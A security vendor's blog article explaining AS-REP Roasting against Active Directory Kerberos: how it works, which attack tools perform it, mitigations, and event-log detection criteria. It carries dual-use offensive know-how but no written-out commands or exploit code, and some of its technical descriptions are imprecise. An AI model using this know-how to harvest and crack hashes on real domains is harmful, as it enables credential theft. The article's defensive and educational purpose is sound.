Redbot Security
Menu
Tech Insight | Active Directory Security

AS-REP Roasting: Exploiting Kerberos for Password Hashes

Kerberos Attacks
Active Directory
Credential Exposure
Active Directory Kerberos attack path illustration for AS-REP Roasting

What is AS-REP Roasting? AS-REP Roasting is a Kerberos attack against user accounts that do not require pre-authentication. An adversary requests an encrypted AS-REP, extracts the hash offline, and brute-forces it to recover clear-text credentials, without alerting domain controllers.

In recent years, the cybersecurity landscape has witnessed a surge in novel attack techniques that target authentication mechanisms in Windows environments. Kerberos Authentication Service Response (AS-REP) Roasting, a technique similar to Kerberoasting, has gained prominence as a method for attackers to compromise Active Directory (AD) authentication systems.

This article provides an in-depth analysis of AS-REP Roasting, the tools attackers commonly employ, and effective mitigation strategies to defend against this threat.

Published by Redbot Security Author: Redbot Security Team Active Directory Security Updated April 2026

Pre-authentication risk

AS-REP Roasting targets accounts where Kerberos pre-authentication is disabled.

Offline hash cracking

Attackers can retrieve encrypted material and crack password hashes offline.

Active Directory exposure

The attack can reveal credential weaknesses that support broader domain compromise.

Why AS-REP Roasting matters in real penetration tests

AS-REP Roasting is one of the identity-layer weaknesses that can support broader Active Directory compromise. Redbot validates these paths through penetration testing services and network penetration testing, where testers look for credential exposure, privilege escalation, and real attack paths.

Teams evaluating providers can also compare service models in our penetration testing companies directory.

Understanding AS-REP Roasting

AS-REP Roasting is an attack technique that targets the Kerberos authentication protocol, which is a fundamental component of Microsoft's Active Directory. Kerberos is used to authenticate users and services within a Windows domain environment. AS-REP Roasting takes advantage of a vulnerability in how Kerberos processes certain types of authentication requests, enabling attackers to retrieve password hashes for user accounts with pre-authentication disabled.

Pre-authentication is a security feature in Kerberos that requires users to prove their identity before attempting to authenticate. However, certain accounts, such as service accounts, might have pre-authentication disabled for legitimate reasons. Attackers exploit this by sending a specific type of request to the domain controller, asking for a “ticket” for a specific user account.

The domain controller responds with an encrypted ticket that contains the user's password hash, which can then be decrypted offline by the attacker. A more technical breakdown in difference would be that a Kerberoasting attack has AS-REQ/AS-REP AND TGS-REQ/TGS-REP. AS-REP Roasting ONLY has AS-REQ/AS-REP. That is because Kerberoasting requests a Service Account Authorization Ticket, whereas AS-REP only requests a Kerberos Authentication Ticket.

Organizations looking to identify these weaknesses proactively should incorporate penetration testing services that specifically evaluate Active Directory attack paths and credential exposure risks.

Tools Employed by Attackers

Several tools are commonly used by attackers to perform AS-REP Roasting attacks:

Rubeus

A powerful post-exploitation tool that attackers can use to interact with Kerberos tickets and perform AS-REP Roasting attacks. It allows attackers to request service tickets for accounts with pre-authentication disabled.

Impacket

A collection of Python scripts that facilitate network protocol exploitation. The GetNPUsers.py script within Impacket can be used to perform AS-REP Roasting attacks and retrieve password hashes.

CrackMapExec

Scripts to automate various post-exploitation tasks, including AS-REP Roasting. It can request service tickets and crack the resulting password hashes.

Mimikatz

Although primarily known for its credential dumping capabilities, Mimikatz can also be used to perform AS-REP Roasting attacks.

Example of AS-REP Roasting

There are two distinct methods by which the attack can be executed. In the scenario where the account's username is known or guessed, the AS-REP Roasting technique can be leveraged by utilizing solely the account name. This approach empowers malicious entities to systematically probe widely-used names, employing brute-force strategies to potentially unveil usernames.

A concrete representation of this concept can be observed in Figure 1, wherein the developers of CrackMapExec provide an example of an AS-REP Roasting attack.

Unauthenticated AS-REP Roasting attack example using CrackMapExec
Figure 1: Unauthenticated AS-REP Roasting

Conversely, an alternative approach to executing the attack involves authentication. If active credentials are accessible within a specific domain, this avenue enables the acquisition of hash values for susceptible accounts, thereby laying bare their vulnerabilities. This process is demonstrated in Figure 2, depicting the outcome of an authentication-based attack.

Authenticated AS-REP Roasting attack example
Figure 2: Authenticated AS-REP Roasting

Mitigation Techniques

To defend against AS-REP Roasting attacks and similar Kerberoasting techniques, organizations should implement a combination of proactive measures and monitoring practices:

Enable Pre-Authentication

Enforce pre-authentication for all user accounts, especially service accounts. This prevents attackers from exploiting the vulnerability that AS-REP Roasting relies upon.

Implement Credential Hygiene

Enforce strong password complexity and regularly rotate passwords for service accounts and privileged users. This reduces the window of opportunity for attackers to exploit password hashes.

Monitor Event Logs

Monitor domain controller event logs for suspicious activity related to Kerberos ticket requests. Detecting and investigating abnormal patterns can help identify potential AS-REP Roasting attempts.

Network Segmentation

Segmenting the network can limit lateral movement for attackers. Restricting access to sensitive systems reduces the potential impact of an AS-REP Roasting attack.

Use Intrusion Detection Systems

Deploy IDS solutions capable of detecting Kerberoasting attempts. These systems can raise alerts when abnormal ticket requests are detected.

These controls are commonly validated during internal and external penetration testing, where testers simulate real attacker behavior against Active Directory environments.


AS-REP Roasting Detection Criteria

The following criteria can be used to identify AS-REP Roasting within the Microsoft Windows Event Log.

Event ID

4768 and 4625

Ticket Encryption Type

0x17

Ticket Options

0x5080000

Service Name

krbtgt

Why AS-REP Roasting Matters in Real Attacks

AS-REP Roasting is rarely the end goal of an attacker. Instead, it is often used as an initial foothold to recover credentials that can be reused across systems, escalated into privileged access, or leveraged for lateral movement within Active Directory environments.

In real-world penetration testing scenarios, recovered credentials from AS-REP Roasting frequently expose weak service accounts, reused passwords, or privileged users. These weaknesses can lead to broader domain compromise when combined with other attack techniques.

This is why AS-REP Roasting is commonly identified during penetration testing services and deeper network penetration testing, where testers validate how credential exposure translates into real attack paths.

Conclusion

AS-REP Roasting is a sophisticated attack technique that targets weaknesses in the Kerberos authentication protocol, allowing attackers to compromise user account password hashes. Understanding the mechanics of AS-REP Roasting and the tools attackers use is crucial for building effective defenses.

By implementing a combination of technical measures, security best practices, and proactive monitoring, organizations can significantly reduce the risk of falling victim to AS-REP Roasting and similar authentication-based attacks. Regular security assessments and staying informed about emerging threats are also essential components of a robust cybersecurity strategy.

More Information on Kerberos Authentication

https://www.tarlogic.com/blog/how-kerberos-works/

About the Author

This article was written by the Redbot Security Team and reflects real-world observations from hands-on security testing, Active Directory attack path analysis, and credential exposure validation.

Related Tech Insights

Continue exploring Active Directory, offensive security, and real-world attack path validation.

Manual Testing

Penetration Testing Services

Validate real-world attack paths across networks, applications, cloud, APIs, and identity layers.

Explore Services
Offensive Security

What Is Offensive Security?

Understand how proactive testing helps organizations identify real-world attack paths before attackers do.

Read Article
Buyer Guide

Penetration Testing Companies Directory

Compare penetration testing provider categories, service models, and evaluation criteria.

View Directory

Need to test Active Directory attack paths?

Redbot Security helps organizations identify credential exposure, Kerberos weaknesses, privilege escalation paths, and real-world network compromise scenarios through senior-led manual penetration testing.

Talk to Redbot Security Explore Penetration Testing Explore Network Testing

References

  1. Kerberos Authentication Service
  2. Microsoft Active Directory Domain Services Overview
  3. Rubeus Reference
  4. Impacket Tools
  5. CrackMapExec Tools
  6. Mimikatz Overview
  7. How Kerberos Works
Show Buttons
Hide Buttons